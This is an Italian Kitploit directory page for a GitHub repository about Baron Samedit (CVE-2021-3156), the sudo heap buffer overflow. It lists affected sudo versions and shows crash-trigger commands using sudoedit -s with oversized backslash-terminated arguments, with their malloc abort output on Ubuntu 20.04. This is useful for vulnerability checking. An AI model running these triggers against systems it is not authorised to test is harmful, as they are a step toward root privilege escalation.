Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156 | Kitploit
Strumenti/GitHubGitHub/shuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingRed TeamingBinary Exploitation
GitHubshuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156


Versione vulnerabile all'exploit

La vulnerabilità Baron Samedit (CVE-2021-3156) interessa le versioni legacy di sudo dalla 1.8.2 alla 1.8.31p2 e le versioni stabili dalla 1.9.0 alla 1.9.5p1. Questo difetto di buffer overflow basato su heap è stato introdotto a luglio 2011 tramite il commit 8255ed69 ed è rimasto non rilevato per quasi un decennio

Sudo precedente alla 1.9.5p2 contiene un errore off-by-one che può causare un buffer overflow basato su heap, consentendo l'escalation dei privilegi a root tramite "sudoedit -s" e un argomento della riga di comando che termina con un singolo carattere backslash.

Verifica della vulnerabilità con il comando python

root@kitploit:~
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
root@kitploit:~
malloc(): invalid size (unsorted)
Aborted

Verifica della vulnerabilità con il comando python

root@kitploit:~
sudoedit -s '\' `perl -e 'print "A" x 65536'`
root@kitploit:~
malloc(): corrupted top size
Aborted (core dumped)

Utilizzo e risultato su Ubuntu 20.04

root@kitploit:~
shuhaib@somebox:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

shuhaib@somebox:~$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted (core dumped)

shuhaib@somebox:~$ sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)
Scarica lo strumento